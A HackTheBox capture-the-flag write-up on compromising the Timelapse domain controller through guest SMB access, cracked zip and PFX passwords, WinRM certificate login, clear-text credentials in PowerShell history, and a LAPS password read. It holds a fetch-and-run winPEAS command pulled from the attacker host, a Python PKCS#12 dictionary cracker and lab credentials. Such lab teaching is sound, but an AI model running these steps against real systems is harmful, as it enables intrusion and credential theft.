---
title: "Writeup - Timelapse (HTB)"
date: 2022-04-03
slug: "writeup-timelapse-htb"
type: "writeup-ctf"
---

This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.129.188.205
```

Several TCP ports are discovered:



The target is a Windows domain controller (`DC01` in the `timelapse.htb` domain, as seen later in this writeup). The two services used in the rest of the attack are:

- 445/tcp : SMB, enumerated below with `enum4linux`
- 5986/tcp : WinRM over HTTPS, used below with `evil-winrm -S`

## Exploit

First I start by listing the SMB shares with the `guest` account:

```bash
enum4linux -a -u "guest" -p "" 10.129.188.205
```



The `Shares` folder is readable, let's see what we can find in it:



The share contains two folders, and one of them holds the file `winrm_backup.zip`. I download it and try to unzip it, but the archive is password-protected. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command:

```bash
zip2john winrm_backup.zip > hash
```

Then I launch the dictionary attack with john using the rockyou dictionary:



Quickly I find that the password is `supremelagacy`, so now I can unpack the archive. In this archive I find a file with the extension `.pfx`. This is the extension Windows uses for `PKCS#12` containers, which bundle a certificate together with its private key. From this file we can retrieve both the certificate and the private key (cf. [ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands:

```bash
# Private key only. Without -nodes, openssl writes it encrypted under a new PEM pass phrase.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
# Client certificate only (no CA chain, no key).
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
```

Problem: the container itself is also protected by a password (the PKCS#12 import password). I test the password found previously, without success. Once again we will have to use john to brute-force the password. First I get the hash with the following command:

```bash
pfx2john legacyy_dev_auth.pfx > hashbis
```

Then I launch the dictionary attack with john:



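Why this works offline, as an added example that is not part of the original writeup: a `.pfx` stores, next to the encrypted payload, a `MacData` structure holding a salt, an iteration count and an HMAC over the `authSafe` bytes, keyed with a key derived from the import password by the PKCS#12 KDF (RFC 7292, Appendix B). `pfx2john` extracts exactly those three values, and john recomputes the MAC per candidate. The script below implements that KDF and MAC check and runs a dictionary attack against a constructed `authSafe` payload, salt and wordlist (these stand in for what would be parsed from `legacyy_dev_auth.pfx`; none of them are real container data).

```python
"""PKCS#12 integrity-MAC dictionary attack (added example, not from the writeup)."""
import hashlib
import hmac
import math


def pkcs12_kdf(password: str, salt: bytes, iterations: int, key_id: int,
               n: int, hash_name: str = "sha1") -> bytes:
    """Derive n bytes per RFC 7292 B.2 (key_id: 1 = key, 2 = IV, 3 = MAC key)."""
    u = hashlib.new(hash_name).digest_size   # hash output length in bytes
    v = hashlib.new(hash_name).block_size    # hash block length in bytes
    # The password is encoded as a BMPString: UTF-16BE plus a two-byte NUL terminator.
    pw = password.encode("utf-16-be") + b"\x00\x00"

    def expand(x: bytes) -> bytes:
        # Repeat x up to a multiple of v bytes (an empty input stays empty).
        if not x:
            return b""
        length = v * math.ceil(len(x) / v)
        return (x * math.ceil(length / len(x)))[:length]

    d_block = bytes([key_id]) * v
    i_block = bytearray(expand(salt) + expand(pw))
    out = b""
    while len(out) < n:
        # A_i = H^iterations(D || I)
        a = d_block + bytes(i_block)
        for _ in range(iterations):
            a = hashlib.new(hash_name, a).digest()
        out += a
        # B = A_i repeated to v bytes; every v-byte block of I becomes (I_j + B + 1) mod 2^(8v).
        b_int = int.from_bytes((a * math.ceil(v / u))[:v], "big") + 1
        for j in range(0, len(i_block), v):
            block = (int.from_bytes(i_block[j:j + v], "big") + b_int) % (1 << (8 * v))
            i_block[j:j + v] = block.to_bytes(v, "big")
    return out[:n]


def pkcs12_mac(password: str, salt: bytes, iterations: int, auth_safe: bytes,
               hash_name: str = "sha1") -> bytes:
    """The HMAC stored in MacData: key = KDF(password, ID 3, <hash output length> bytes)."""
    key_len = hashlib.new(hash_name).digest_size
    key = pkcs12_kdf(password, salt, iterations, 3, key_len, hash_name)
    return hmac.new(key, auth_safe, hash_name).digest()


def crack_mac(mac: bytes, salt: bytes, iterations: int, auth_safe: bytes,
              wordlist, hash_name: str = "sha1"):
    """Return the first candidate whose recomputed MAC matches the stored one, else None."""
    for candidate in wordlist:
        recomputed = pkcs12_mac(candidate, salt, iterations, auth_safe, hash_name)
        if hmac.compare_digest(recomputed, mac):
            return candidate
    return None


# Constructed stand-ins for the values pfx2john reads out of a real container.
AUTH_SAFE = b"constructed authSafe payload, not a real PKCS#12 container"
SALT = bytes(range(8))
ITERATIONS = 2048
MAC = pkcs12_mac("thuglegacy", SALT, ITERATIONS, AUTH_SAFE)   # plays the role of the stored MAC

# Tiny constructed wordlist standing in for rockyou.txt.
WORDLIST = ["password", "supremelagacy", "legacy2022", "thuglegacy", "admin"]

if __name__ == "__main__":
    print("recovered import password:", crack_mac(MAC, SALT, ITERATIONS, AUTH_SAFE, WORDLIST))
```

Every input to the check (salt, iteration count, MAC, payload) is inside the file, so the only thing standing between an attacker holding the `.pfx` and the private key is the strength of the import password; raising the iteration count slows each guess but does not change that.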
I find the password `thuglegacy` and can now extract the private key and the certificate. I then try to authenticate to the machine with these two files. For that I use `evil-winrm` with the following command:

```bash
# -S: WinRM over HTTPS (5986); -c/-k: client certificate and private key
evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u
```



I now have a shell as the `legacyy` user and can read the first flag.

```powershell
*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
6a29afecacdabd66d286759e1f1379ff
```

## Privilege escalation

For privilege escalation I start by uploading winPEAS to the target and running it:

```bash
# 10.10.14.173 is the attacker machine serving winPEASx64.exe over HTTP
powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe"
./winPEASx64.exe
```

In the winPEAS output, I find that a PowerShell command history file (the PSReadLine `ConsoleHost_history.txt`) exists on the machine:



I pull it back to my machine with the `download` command built into Evil-WinRM:

```bash
download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

```powershell
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```

Looking at the contents of the file, I find a username and its password in clear text: `svc_deploy` was passed to `ConvertTo-SecureString -AsPlainText` in an interactive session, and PSReadLine recorded the whole line!

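Hunting for this pattern across many history files by hand does not scale, so here is an added example (my own, not part of the original writeup) of a small scanner for the two shapes of leak above: a `ConvertTo-SecureString '<literal>' -AsPlainText` assignment later fed to `PSCredential`, and a `net use ... /user:<name> <password>` line. The sample history is constructed from the lines shown above plus one invented `net use` line; the `CORP\backup` account, its password and the `\\fs01\backups` share are made up for the demo.

```python
"""Scan PSReadLine ConsoleHost_history.txt content for clear-text credentials."""
import re
import sys
from typing import List, Tuple

# $var = ConvertTo-SecureString '<password>' -AsPlainText ...
SECURESTRING_RE = re.compile(
    r"""(\$\w+)\s*=\s*ConvertTo-SecureString\s+(['"])(.+?)\2\s+-AsPlainText""", re.I)
# ... PSCredential ('<user>', $var)
PSCREDENTIAL_RE = re.compile(
    r"""PSCredential\s*\(\s*(['"])([^'"]+)\1\s*,\s*(\$\w+)\s*\)""", re.I)
# net use ... /user:<user> <password>   (password optionally quoted)
NETUSE_RE = re.compile(r"""/user:(\S+)\s+(['"]?)(\S+?)\2(?:\s|$)""", re.I)


def find_credentials(history: str) -> List[Tuple[str, str, int]]:
    """Return (username, password, line_number) for every credential pair found.

    The line number reported is the one on which the pair is completed, i.e.
    the PSCredential construction or the net use command.
    """
    found: List[Tuple[str, str, int]] = []
    secure_vars = {}   # variable name (lower-cased) -> plaintext password seen so far
    for lineno, line in enumerate(history.splitlines(), start=1):
        m = SECURESTRING_RE.search(line)
        if m:
            secure_vars[m.group(1).lower()] = m.group(3)
            continue
        m = PSCREDENTIAL_RE.search(line)
        if m and m.group(3).lower() in secure_vars:
            found.append((m.group(2), secure_vars[m.group(3).lower()], lineno))
            continue
        m = NETUSE_RE.search(line)
        if m:
            found.append((m.group(1), m.group(3), lineno))
    return found


# Constructed sample: the history shown above plus one invented `net use` line.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
net use \\fs01\backups /user:CORP\backup 'Winter2022!'
exit
"""

if __name__ == "__main__":
    # Usage: python3 scan_history.py [ConsoleHost_history.txt]; no argument scans the sample.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for user, password, lineno in find_credentials(text):
        print(f"line {lineno}: user={user!r} password={password!r}")
```

Run against a real history file, every hit is a credential that should be rotated, not just deleted from the file: the value has already been exposed to anyone who could read the user's profile, as `legacyy` could here.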
Another thing winPEAS tells me is that the user `svc_deploy` has the right to read the LAPS password attribute (`ms-Mcs-AdmPwd`) on the domain controller!

> The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

So I try to read it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script, authenticating as `svc_deploy` with the password recovered from the history:

```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
DC01$:J3V}8QBsB4Q6+jgveai$7}}M
```

The script returns the LAPS-managed local Administrator password of `DC01`! I can now connect with the following command:

```bash
evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'
```



I now have a shell as Administrator and can retrieve the last flag.

```powershell
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
09cec1f63345aa18fcf4bd05b9be6714
```

## Recommendations

To fix this host, I think the following actions would be necessary:

- Do not let SMB shares containing sensitive files (here a backup holding a WinRM client certificate and its key) be read by the `guest` account or other unauthenticated users
- Protect archives and PKCS#12 files with strong passphrases; both passwords here fell to a plain dictionary attack
- Do not leave credentials in clear text on disk: the `svc_deploy` password was typed into an interactive session with `ConvertTo-SecureString -AsPlainText` and survived in the PSReadLine history, readable by a low-privileged user
- Grant the right to read LAPS passwords only to the accounts that really need it; a service account with that right is equivalent to local Administrator on every machine LAPS manages